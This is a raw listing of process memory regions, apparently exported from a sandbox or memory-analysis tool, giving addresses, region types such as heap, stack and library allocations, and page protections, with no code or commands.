|
||
371D000
|
heap
|
page read and write
|
||
1ABE6757000
|
heap
|
page read and write
|
||
2F0C000
|
stack
|
page read and write
|
||
1ABE8901000
|
heap
|
page read and write
|
||
73D0000
|
trusted library allocation
|
page read and write
|
||
A11000
|
heap
|
page read and write
|
||
1ABE895A000
|
heap
|
page read and write
|
||
4A80000
|
trusted library allocation
|
page read and write
|
||
4881000
|
heap
|
page read and write
|
||
FC000
|
stack
|
page read and write
|
||
1ABE676E000
|
heap
|
page read and write
|
||
1ABE881D000
|
heap
|
page read and write
|
||
F6E000
|
stack
|
page read and write
|
||
A6C000
|
heap
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
C60000
|
trusted library allocation
|
page execute and read and write
|
||
7430000
|
trusted library allocation
|
page read and write
|
||
1ABE67E9000
|
heap
|
page read and write
|
||
2B7A81C5000
|
heap
|
page read and write
|
||
2B7AA19B000
|
trusted library allocation
|
page read and write
|
||
22671000
|
heap
|
page read and write
|
||
2B7A9DD2000
|
trusted library allocation
|
page read and write
|
||
1ABE8808000
|
heap
|
page read and write
|
||
7210000
|
trusted library allocation
|
page read and write
|
||
CC3B1FE000
|
stack
|
page read and write
|
||
1ABE88A9000
|
heap
|
page read and write
|
||
1ABE882A000
|
heap
|
page read and write
|
||
2B7A68D0000
|
heap
|
page read and write
|
||
1ABE67CC000
|
heap
|
page read and write
|
||
2B7AA362000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
71E0000
|
trusted library allocation
|
page read and write
|
||
A13000
|
heap
|
page read and write
|
||
FAE000
|
stack
|
page read and write
|
||
1ABE8901000
|
heap
|
page read and write
|
||
2B7B81E0000
|
trusted library allocation
|
page read and write
|
||
1ABE88E1000
|
heap
|
page read and write
|
||
1ABE86EA000
|
heap
|
page read and write
|
||
1ABE67CA000
|
heap
|
page read and write
|
||
B6A000
|
trusted library allocation
|
page execute and read and write
|
||
CC3AB83000
|
stack
|
page read and write
|
||
A39000
|
heap
|
page read and write
|
||
22671000
|
heap
|
page read and write
|
||
22671000
|
heap
|
page read and write
|
||
30B0000
|
heap
|
page read and write
|
||
6CC0000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1E158620000
|
heap
|
page read and write
|
||
A11000
|
heap
|
page read and write
|
||
1ABE86E4000
|
heap
|
page read and write
|
||
73C0000
|
trusted library allocation
|
page read and write
|
||
2B7C08F0000
|
heap
|
page read and write
|
||
51AF000
|
stack
|
page read and write
|
||
2B7A9DEB000
|
trusted library allocation
|
page read and write
|
||
A19000
|
heap
|
page read and write
|
||
1E1587A0000
|
heap
|
page read and write
|
||
1ABE6758000
|
heap
|
page read and write
|
||
23813000
|
heap
|
page read and write
|
||
C8D000
|
heap
|
page read and write
|
||
CC3C0CE000
|
stack
|
page read and write
|
||
2B7A86F4000
|
trusted library allocation
|
page read and write
|
||
7177000
|
heap
|
page read and write
|
||
61C38FF000
|
stack
|
page read and write
|
||
71A0000
|
heap
|
page read and write
|
||
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
2B7A8BBC000
|
trusted library allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
CC3C04E000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page execute and read and write
|
||
A19000
|
heap
|
page read and write
|
||
A19000
|
heap
|
page read and write
|
||
2CC5000
|
heap
|
page read and write
|
||
6615000
|
heap
|
page read and write
|
||
A10000
|
trusted library section
|
page read and write
|
||
1ABE8711000
|
heap
|
page read and write
|
||
AFC000
|
heap
|
page read and write
|
||
1ABE67DC000
|
heap
|
page read and write
|
||
2B7AA3D0000
|
trusted library allocation
|
page read and write
|
||
2B7A66BA000
|
heap
|
page read and write
|
||
47C1000
|
trusted library allocation
|
page read and write
|
||
1ABE8815000
|
heap
|
page read and write
|
||
A14000
|
heap
|
page read and write
|
||
A1D000
|
heap
|
page read and write
|
||
7F20000
|
trusted library allocation
|
page execute and read and write
|
||
9470000
|
trusted library allocation
|
page execute and read and write
|
||
1ABE89AA000
|
heap
|
page read and write
|
||
93A0000
|
trusted library allocation
|
page read and write
|
||
1ABE881C000
|
heap
|
page read and write
|
||
A18000
|
heap
|
page read and write
|
||
2B7A8CC9000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2B7A6810000
|
heap
|
page readonly
|
||
A19000
|
heap
|
page read and write
|
||
A0D000
|
heap
|
page read and write
|
||
1ABE6801000
|
heap
|
page read and write
|
||
CC3B67C000
|
stack
|
page read and write
|
||
2FC0000
|
heap
|
page readonly
|
||
2B7A83F8000
|
trusted library allocation
|
page read and write
|
||
6630000
|
heap
|
page read and write
|
||
22771000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2B7C01D0000
|
heap
|
page read and write
|
||
1ABE87E1000
|
heap
|
page read and write
|
||
1ABE88B3000
|
heap
|
page read and write
|
||
7FFD9B984000
|
trusted library allocation
|
page read and write
|
||
2B7A96E9000
|
trusted library allocation
|
page read and write
|
||
A19000
|
heap
|
page read and write
|
||
557000
|
stack
|
page read and write
|
||
33AE000
|
stack
|
page read and write
|
||
73A0000
|
trusted library allocation
|
page read and write
|
||
CC3AFFE000
|
stack
|
page read and write
|
||
28AF000
|
unkown
|
page read and write
|
||
2B7A85E3000
|
trusted library allocation
|
page read and write
|
||
1ABE8702000
|
heap
|
page read and write
|
||
A2B000
|
heap
|
page read and write
|
||
2B7A8C55000
|
trusted library allocation
|
page read and write
|
||
A0C000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
A14000
|
heap
|
page read and write
|
||
1ABE88C1000
|
heap
|
page read and write
|
||
7E60000
|
trusted library allocation
|
page read and write
|
||
71C2000
|
trusted library allocation
|
page read and write
|
||
6BA0000
|
direct allocation
|
page read and write
|
||
22671000
|
heap
|
page read and write
|
||
1ABE8882000
|
heap
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
9DA000
|
heap
|
page read and write
|
||
1ABE887F000
|
heap
|
page read and write
|
||
7200000
|
trusted library allocation
|
page read and write
|
||
26B0000
|
heap
|
page read and write
|
||
22671000
|
heap
|
page read and write
|
||
9042000
|
heap
|
page read and write
|
||
A11000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
70B0000
|
heap
|
page read and write
|
||
2B7A9E18000
|
trusted library allocation
|
page read and write
|
||
A8A000
|
heap
|
page read and write
|
||
90BB000
|
heap
|
page read and write
|
||
A0C000
|
heap
|
page read and write
|
||
BB0000
|
heap
|
page execute and read and write
|
||
7FFD9B982000
|
trusted library allocation
|
page read and write
|
||
2B7A6800000
|
trusted library allocation
|
page read and write
|
||
A6E000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
ADD000
|
heap
|
page read and write
|
||
1ABE897F000
|
heap
|
page read and write
|
||
CC3B17E000
|
stack
|
page read and write
|
||
A17000
|
heap
|
page read and write
|
||
6604000
|
heap
|
page read and write
|
||
23FE000
|
stack
|
page read and write
|
||
1ABE67E9000
|
heap
|
page read and write
|
||
1ABE8711000
|
heap
|
page read and write
|
||
4E0000
|
heap
|
page read and write
|
||
A4D000
|
trusted library allocation
|
page execute and read and write
|
||
7420000
|
trusted library allocation
|
page read and write
|
||
1ABE88CE000
|
heap
|
page read and write
|
||
940E000
|
stack
|
page read and write
|
||
53AF000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
A19000
|
heap
|
page read and write
|
||
3079000
|
stack
|
page read and write
|
||
1ABE86E1000
|
heap
|
page read and write
|
||
1ABE6822000
|
heap
|
page read and write
|
||
662A000
|
heap
|
page read and write
|
||
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
AE9000
|
heap
|
page read and write
|
||
889000
|
heap
|
page read and write
|
||
1ABE86ED000
|
heap
|
page read and write
|
||
6615000
|
heap
|
page read and write
|
||
2C70000
|
heap
|
page read and write
|
||
6B70000
|
direct allocation
|
page read and write
|
||
1ABE8893000
|
heap
|
page read and write
|
||
CC3ABCE000
|
stack
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
2B7C0979000
|
heap
|
page read and write
|
||
4889000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
2E2E000
|
stack
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
CC3B0FE000
|
stack
|
page read and write
|
||
23AE000
|
unkown
|
page read and write
|
||
A01000
|
heap
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
6621000
|
heap
|
page read and write
|
||
2B7A66BE000
|
heap
|
page read and write
|
||
1ABE8711000
|
heap
|
page read and write
|
||
1ABE8848000
|
heap
|
page read and write
|
||
662C000
|
heap
|
page read and write
|
||
1ABE6A10000
|
heap
|
page read and write
|
||
4A80000
|
trusted library allocation
|
page read and write
|
||
9082000
|
heap
|
page read and write
|
||
1ABE8833000
|
heap
|
page read and write
|
||
2B7A66C4000
|
heap
|
page read and write
|
||
1ABE8802000
|
heap
|
page read and write
|
||
1ABE889E000
|
heap
|
page read and write
|
||
1ABE88CA000
|
heap
|
page read and write
|
||
228FA000
|
heap
|
page read and write
|
||
934E000
|
stack
|
page read and write
|
||
1ABE86EF000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
A1D000
|
heap
|
page read and write
|
||
1ABE67D9000
|
heap
|
page read and write
|
||
1ABE6825000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
1ABE6758000
|
heap
|
page read and write
|
||
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
A95000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
1ABE8833000
|
heap
|
page read and write
|
||
1ABE8809000
|
heap
|
page read and write
|
||
A1D000
|
heap
|
page read and write
|
||
32A0000
|
heap
|
page read and write
|
||
7FFD9BB40000
|
trusted library allocation
|
page execute and read and write
|
||
749B000
|
stack
|
page read and write
|
||
2311D000
|
heap
|
page read and write
|
||
94A0000
|
direct allocation
|
page read and write
|
||
1ABE6828000
|
heap
|
page read and write
|
||
A16000
|
heap
|
page read and write
|
||
22671000
|
heap
|
page read and write
|
||
1E158600000
|
heap
|
page read and write
|
||
7E30000
|
heap
|
page read and write
|
||
4641000
|
heap
|
page read and write
|
||
2B7C065E000
|
heap
|
page read and write
|
||
2B7B84CB000
|
trusted library allocation
|
page read and write
|
||
A14000
|
heap
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
26BC000
|
heap
|
page read and write
|
||
23186000
|
heap
|
page read and write
|
||
CC3AE7E000
|
stack
|
page read and write
|
||
2B7A88E4000
|
trusted library allocation
|
page read and write
|
||
A1B000
|
heap
|
page read and write
|
||
662C000
|
heap
|
page read and write
|
||
190000
|
heap
|
page readonly
|
||
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page execute and read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
1ABE6700000
|
heap
|
page read and write
|
||
9480000
|
direct allocation
|
page read and write
|
||
93B0000
|
trusted library allocation
|
page read and write
|
||
A43000
|
trusted library allocation
|
page execute and read and write
|
||
1ABE682D000
|
heap
|
page read and write
|
||
22DF2000
|
heap
|
page read and write
|
||
1ABE88D3000
|
heap
|
page read and write
|
||
C75000
|
heap
|
page execute and read and write
|
||
2B40000
|
heap
|
page read and write
|
||
A87000
|
heap
|
page read and write
|
||
4884000
|
heap
|
page read and write
|
||
5A6E000
|
trusted library allocation
|
page read and write
|
||
1ABE682E000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1ABE8833000
|
heap
|
page read and write
|
||
73F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
page execute and read and write
|
||
1ABE67CC000
|
heap
|
page read and write
|
||
1ABE88CE000
|
heap
|
page read and write
|
||
1ABE8711000
|
heap
|
page read and write
|
||
4A80000
|
trusted library allocation
|
page read and write
|
||
1ABE88B2000
|
heap
|
page read and write
|
||
70FA000
|
heap
|
page read and write
|
||
113000
|
stack
|
page read and write
|
||
1ABE8833000
|
heap
|
page read and write
|
||
A17000
|
heap
|
page read and write
|
||
1ABE88C1000
|
heap
|
page read and write
|
||
22F0E000
|
heap
|
page read and write
|
||
1ABE6802000
|
heap
|
page read and write
|
||
1ABE881E000
|
heap
|
page read and write
|
||
1ABE884B000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
7DF4EB590000
|
trusted library allocation
|
page execute and read and write
|
||
7E27000
|
stack
|
page read and write
|
||
1ABE86E7000
|
heap
|
page read and write
|
||
6621000
|
heap
|
page read and write
|
||
1ABE6A1B000
|
heap
|
page read and write
|
||
BA0000
|
heap
|
page readonly
|
||
1ABE8874000
|
heap
|
page read and write
|
||
A01000
|
heap
|
page read and write
|
||
23D21000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
662A000
|
heap
|
page read and write
|
||
1ABE88B0000
|
heap
|
page read and write
|
||
6BB0000
|
direct allocation
|
page read and write
|
||
1ABE8837000
|
heap
|
page read and write
|
||
1ABE86F5000
|
heap
|
page read and write
|
||
A80000
|
heap
|
page read and write
|
||
33C0000
|
heap
|
page read and write
|
||
A35000
|
heap
|
page read and write
|
||
1ABE8882000
|
heap
|
page read and write
|
||
662C000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
A5A000
|
heap
|
page read and write
|
||
6F6E000
|
stack
|
page read and write
|
||
2F6F000
|
unkown
|
page read and write
|
||
1ABE67A9000
|
heap
|
page read and write
|
||
1ABE8821000
|
heap
|
page read and write
|
||
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
61C39FE000
|
stack
|
page read and write
|
||
1ABE88C3000
|
heap
|
page read and write
|
||
2B7A6670000
|
heap
|
page read and write
|
||
1ABE88C1000
|
heap
|
page read and write
|
||
4643000
|
heap
|
page read and write
|
||
3710000
|
heap
|
page read and write
|
||
1ABE8709000
|
heap
|
page read and write
|
||
7FFD9B9DC000
|
trusted library allocation
|
page execute and read and write
|
||
1ABE8882000
|
heap
|
page read and write
|
||
47B9000
|
heap
|
page read and write
|
||
F7000
|
stack
|
page read and write
|
||
2B7A8160000
|
heap
|
page read and write
|
||
306F000
|
stack
|
page read and write
|
||
9D9000
|
heap
|
page read and write
|
||
5F0000
|
trusted library allocation
|
page read and write
|
||
2BC0000
|
heap
|
page read and write
|
||
2B7C0777000
|
heap
|
page execute and read and write
|
||
31E0000
|
heap
|
page read and write
|
||
1ABE88CE000
|
heap
|
page read and write
|
||
4FE000
|
heap
|
page read and write
|
||
57D1000
|
trusted library allocation
|
page read and write
|
||
1ABE86EB000
|
heap
|
page read and write
|
||
357F000
|
stack
|
page read and write
|
||
938C000
|
stack
|
page read and write
|
||
1ABE8711000
|
heap
|
page read and write
|
||
1ABE8893000
|
heap
|
page read and write
|
||
1ABE6A1E000
|
heap
|
page read and write
|
||
1ABE88C6000
|
heap
|
page read and write
|
||
A08000
|
heap
|
page read and write
|
||
1ABE6A1A000
|
heap
|
page read and write
|
||
1ABE6826000
|
heap
|
page read and write
|
||
2B7AA1CC000
|
trusted library allocation
|
page read and write
|
||
6621000
|
heap
|
page read and write
|
||
1ABE8882000
|
heap
|
page read and write
|
||
662E000
|
heap
|
page read and write
|
||
C50000
|
trusted library allocation
|
page read and write
|
||
61C3EFB000
|
stack
|
page read and write
|
||
1ABE82A0000
|
heap
|
page read and write
|
||
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
1E15841A000
|
heap
|
page read and write
|
||
1ABE895A000
|
heap
|
page read and write
|
||
1ABE873B000
|
heap
|
page read and write
|
||
1ABE88B3000
|
heap
|
page read and write
|
||
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
29AF000
|
stack
|
page read and write
|
||
1ABE881F000
|
heap
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
84C09FF000
|
stack
|
page read and write
|
||
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
6E6E000
|
stack
|
page read and write
|
||
9092000
|
heap
|
page read and write
|
||
2B7A6880000
|
heap
|
page execute and read and write
|
||
1ABE8833000
|
heap
|
page read and write
|
||
1ABE889E000
|
heap
|
page read and write
|
||
23695000
|
heap
|
page read and write
|
||
7440000
|
trusted library allocation
|
page read and write
|
||
31DE000
|
stack
|
page read and write
|
||
226E8000
|
heap
|
page read and write
|
||
9390000
|
trusted library allocation
|
page read and write
|
||
A4E000
|
heap
|
page read and write
|
||
61C3AFD000
|
stack
|
page read and write
|
||
1ABE88C0000
|
heap
|
page read and write
|
||
1ABE895B000
|
heap
|
page read and write
|
||
2B7B84BD000
|
trusted library allocation
|
page read and write
|
||
A11000
|
heap
|
page read and write
|
||
2A8D000
|
stack
|
page read and write
|
||
7387000
|
trusted library allocation
|
page read and write
|
||
2B7A8CA5000
|
trusted library allocation
|
page read and write
|
||
466E000
|
stack
|
page read and write
|
||
7FFD9B99B000
|
trusted library allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
228F1000
|
heap
|
page read and write
|
||
2B7A66D8000
|
heap
|
page read and write
|
||
4881000
|
heap
|
page read and write
|
||
1ABE67D9000
|
heap
|
page read and write
|
||
2B7A66B7000
|
heap
|
page read and write
|
||
1ABE6900000
|
heap
|
page read and write
|
||
1ABE8846000
|
heap
|
page read and write
|
||
660C000
|
heap
|
page read and write
|
||
61C34F9000
|
stack
|
page read and write
|
||
23318000
|
heap
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
22585000
|
heap
|
page read and write
|
||
662A000
|
heap
|
page read and write
|
||
229E3000
|
heap
|
page read and write
|
||
6B40000
|
direct allocation
|
page read and write
|
||
1ABE888B000
|
heap
|
page read and write
|
||
1ABE682E000
|
heap
|
page read and write
|
||
1ABE66F0000
|
heap
|
page read and write
|
||
229FB000
|
heap
|
page read and write
|
||
A11000
|
heap
|
page read and write
|
||
6630000
|
heap
|
page read and write
|
||
662A000
|
heap
|
page read and write
|
||
A19000
|
heap
|
page read and write
|
||
8020000
|
heap
|
page read and write
|
||
1ABE8887000
|
heap
|
page read and write
|
||
A0E000
|
heap
|
page read and write
|
||
6630000
|
heap
|
page read and write
|
||
7380000
|
trusted library allocation
|
page read and write
|
||
B75000
|
trusted library allocation
|
page execute and read and write
|
||
2B7AA216000
|
trusted library allocation
|
page read and write
|
||
4640000
|
heap
|
page read and write
|
||
1ABE881D000
|
heap
|
page read and write
|
||
1ABE67A7000
|
heap
|
page read and write
|
||
9D0000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
2B7C0810000
|
heap
|
page read and write
|
||
1ABE88C6000
|
heap
|
page read and write
|
||
1ABE88CE000
|
heap
|
page read and write
|
||
1ABE6A15000
|
heap
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
1ABE8739000
|
heap
|
page read and write
|
||
228F3000
|
heap
|
page read and write
|
||
1ABE882E000
|
heap
|
page read and write
|
||
1ABE8711000
|
heap
|
page read and write
|
||
1ABE86ED000
|
heap
|
page read and write
|
||
C40000
|
trusted library allocation
|
page read and write
|
||
22671000
|
heap
|
page read and write
|
||
2B7A6700000
|
heap
|
page read and write
|
||
1ABE8711000
|
heap
|
page read and write
|
||
A11000
|
heap
|
page read and write
|
||
9DB000
|
heap
|
page read and write
|
||
81F000
|
stack
|
page read and write
|
||
2B7AA384000
|
trusted library allocation
|
page read and write
|
||
CC3C14D000
|
stack
|
page read and write
|
||
1ABE884B000
|
heap
|
page read and write
|
||
9E30000
|
direct allocation
|
page execute and read and write
|
||
7FFD9BB3A000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
94B0000
|
direct allocation
|
page read and write
|
||
1ABE8815000
|
heap
|
page read and write
|
||
1ABE86F0000
|
heap
|
page read and write
|
||
4919000
|
trusted library allocation
|
page read and write
|
||
2B7A8080000
|
trusted library allocation
|
page read and write
|
||
1ABE69C0000
|
remote allocation
|
page read and write
|
||
83E000
|
stack
|
page read and write
|
||
99E000
|
stack
|
page read and write
|
||
2B7A8CDA000
|
trusted library allocation
|
page read and write
|
||
23418000
|
heap
|
page read and write
|
||
1ABE8802000
|
heap
|
page read and write
|
||
2B7A870F000
|
trusted library allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
1ABE8701000
|
heap
|
page read and write
|
||
1ABE88D3000
|
heap
|
page read and write
|
||
23D7A000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
A8A000
|
heap
|
page read and write
|
||
6604000
|
heap
|
page read and write
|
||
A1D000
|
heap
|
page read and write
|
||
1ABE8833000
|
heap
|
page read and write
|
||
8739000
|
trusted library allocation
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
4641000
|
heap
|
page read and write
|
||
2F49000
|
stack
|
page read and write
|
||
644000
|
heap
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
10F000
|
stack
|
page read and write
|
||
7FFD9B983000
|
trusted library allocation
|
page execute and read and write
|
||
B90000
|
trusted library allocation
|
page read and write
|
||
35CC000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
61C35FF000
|
stack
|
page read and write
|
||
9D7000
|
heap
|
page read and write
|
||
1ABE884B000
|
heap
|
page read and write
|
||
A39000
|
heap
|
page read and write
|
||
907E000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
29CD000
|
stack
|
page read and write
|
||
A19000
|
heap
|
page read and write
|
||
4641000
|
heap
|
page read and write
|
||
456A000
|
heap
|
page read and write
|
||
4881000
|
heap
|
page read and write
|
||
CC3B5FE000
|
stack
|
page read and write
|
||
46EE000
|
stack
|
page read and write
|
||
2B8D000
|
stack
|
page read and write
|
||
7FFD9BA36000
|
trusted library allocation
|
page read and write
|
||
1ABE88C6000
|
heap
|
page read and write
|
||
8543000
|
trusted library allocation
|
page read and write
|
||
487F000
|
stack
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
94C0000
|
direct allocation
|
page read and write
|
||
7175000
|
heap
|
page read and write
|
||
2277E000
|
heap
|
page read and write
|
||
35C3000
|
heap
|
page read and write
|
||
DC000
|
stack
|
page read and write
|
||
6613000
|
heap
|
page read and write
|
||
6630000
|
heap
|
page read and write
|
||
35C0000
|
heap
|
page read and write
|
||
A50000
|
trusted library allocation
|
page read and write
|
||
6624000
|
heap
|
page read and write
|
||
1ABE88B3000
|
heap
|
page read and write
|
||
6613000
|
heap
|
page read and write
|
||
7FFD9B98D000
|
trusted library allocation
|
page execute and read and write
|
||
2B7AA211000
|
trusted library allocation
|
page read and write
|
||
7350000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
6FAE000
|
stack
|
page read and write
|
||
22671000
|
heap
|
page read and write
|
||
1ABE682E000
|
heap
|
page read and write
|
||
1ABE88B8000
|
heap
|
page read and write
|
||
1ABE88C7000
|
heap
|
page read and write
|
||
BFE000
|
stack
|
page read and write
|
||
3260000
|
heap
|
page read and write
|
||
1ABE67A3000
|
heap
|
page read and write
|
||
22580000
|
heap
|
page read and write
|
||
1ABE895B000
|
heap
|
page read and write
|
||
AD000
|
stack
|
page read and write
|
||
880000
|
heap
|
page read and write
|
||
1ABE88C6000
|
heap
|
page read and write
|
||
210000
|
heap
|
page read and write
|
||
B72000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
2B7AA3EA000
|
trusted library allocation
|
page read and write
|
||
61C3BFB000
|
stack
|
page read and write
|
||
84C05FD000
|
stack
|
page read and write
|
||
1ABE8874000
|
heap
|
page read and write
|
||
C80000
|
heap
|
page read and write
|
||
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
6615000
|
heap
|
page read and write
|
||
4A80000
|
trusted library allocation
|
page read and write
|
||
57C1000
|
trusted library allocation
|
page read and write
|
||
1ABE86FA000
|
heap
|
page read and write
|
||
2B7A67A0000
|
heap
|
page read and write
|
||
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
323E000
|
stack
|
page read and write
|
||
4881000
|
heap
|
page read and write
|
||
2D8E000
|
stack
|
page read and write
|
||
2C50000
|
heap
|
page read and write
|
||
2B7C09C2000
|
heap
|
page read and write
|
||
1ABE682E000
|
heap
|
page read and write
|
||
1ABE67E9000
|
heap
|
page read and write
|
||
1ABE6A18000
|
heap
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
1ABE8711000
|
heap
|
page read and write
|
||
22C7E000
|
heap
|
page read and write
|
||
2B7A667E000
|
heap
|
page read and write
|
||
9038000
|
heap
|
page read and write
|
||
1ABE8863000
|
heap
|
page read and write
|
||
1ABE8930000
|
heap
|
page read and write
|
||
1ABE86E0000
|
heap
|
page read and write
|
||
6624000
|
heap
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
2B7C0998000
|
heap
|
page read and write
|
||
6C3A000
|
stack
|
page read and write
|
||
B70000
|
trusted library allocation
|
page read and write
|
||
5171000
|
heap
|
page read and write
|
||
2DD0000
|
heap
|
page read and write
|
||
1E1587A5000
|
heap
|
page read and write
|
||
1ABE8739000
|
heap
|
page read and write
|
||
2B7A81C0000
|
heap
|
page read and write
|
||
8031000
|
trusted library allocation
|
page read and write
|
||
7165000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
72CF000
|
stack
|
page read and write
|
||
A19000
|
heap
|
page read and write
|
||
2CC4000
|
heap
|
page read and write
|
||
1ABE6730000
|
heap
|
page read and write
|
||
1ABE88E1000
|
heap
|
page read and write
|
||
1ABE881F000
|
heap
|
page read and write
|
||
1ABE8893000
|
heap
|
page read and write
|
||
23180000
|
heap
|
page read and write
|
||
2CA0000
|
heap
|
page read and write
|
||
1ABE67CA000
|
heap
|
page read and write
|
||
1ABE89B6000
|
heap
|
page read and write
|
||
1ABE88E1000
|
heap
|
page read and write
|
||
2B7C06F0000
|
heap
|
page read and write
|
||
2B7C068E000
|
heap
|
page read and write
|
||
4889000
|
heap
|
page read and write
|
||
710D000
|
heap
|
page read and write
|
||
51C000
|
stack
|
page read and write
|
||
1ABE6822000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1ABE88CA000
|
heap
|
page read and write
|
||
4888000
|
heap
|
page read and write
|
||
6B60000
|
direct allocation
|
page read and write
|
||
1ABE88B3000
|
heap
|
page read and write
|
||
22C15000
|
heap
|
page read and write
|
||
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
87E000
|
stack
|
page read and write
|
||
2B7A8CBE000
|
trusted library allocation
|
page read and write
|
||
2B7C0770000
|
heap
|
page execute and read and write
|
||
9030000
|
heap
|
page read and write
|
||
9460000
|
trusted library allocation
|
page read and write
|
||
2B7A80B0000
|
trusted library allocation
|
page read and write
|
||
7173000
|
heap
|
page read and write
|
||
336F000
|
stack
|
page read and write
|
||
A97000
|
heap
|
page read and write
|
||
A01000
|
heap
|
page read and write
|
||
1ABE88CE000
|
heap
|
page read and write
|
||
A1D000
|
heap
|
page read and write
|
||
A28000
|
heap
|
page read and write
|
||
1ABE6783000
|
heap
|
page read and write
|
||
2C3D000
|
stack
|
page read and write
|
||
1ABE8711000
|
heap
|
page read and write
|
||
1ABE88B8000
|
heap
|
page read and write
|
||
1ABE67BE000
|
heap
|
page read and write
|
||
A97000
|
heap
|
page read and write
|
||
2B7A8B06000
|
trusted library allocation
|
page read and write
|
||
1ABE86E2000
|
heap
|
page read and write
|
||
582A000
|
trusted library allocation
|
page read and write
|
||
1ABE88BD000
|
heap
|
page read and write
|
||
2B7A9F8D000
|
trusted library allocation
|
page read and write
|
||
22571000
|
heap
|
page read and write
|
||
481D000
|
trusted library allocation
|
page read and write
|
||
1ABE67CA000
|
heap
|
page read and write
|
||
57E9000
|
trusted library allocation
|
page read and write
|
||
7F95000
|
trusted library allocation
|
page read and write
|
||
2B7A6820000
|
trusted library allocation
|
page read and write
|
||
CC3AEFE000
|
stack
|
page read and write
|
||
22DFD000
|
heap
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
A19000
|
heap
|
page read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
1DE000
|
stack
|
page read and write
|
||
2CC2000
|
heap
|
page read and write
|
||
1ABE88B3000
|
heap
|
page read and write
|
||
1ABE8882000
|
heap
|
page read and write
|
||
9DF000
|
stack
|
page read and write
|
||
2C4E000
|
unkown
|
page read and write
|
||
2B7A67E0000
|
trusted library allocation
|
page read and write
|
||
22671000
|
heap
|
page read and write
|
||
2B7C09A7000
|
heap
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
1ABE682E000
|
heap
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
55D000
|
stack
|
page read and write
|
||
A60000
|
heap
|
page read and write
|
||
A8A000
|
heap
|
page read and write
|
||
1ABE88AD000
|
heap
|
page read and write
|
||
1ABE6A19000
|
heap
|
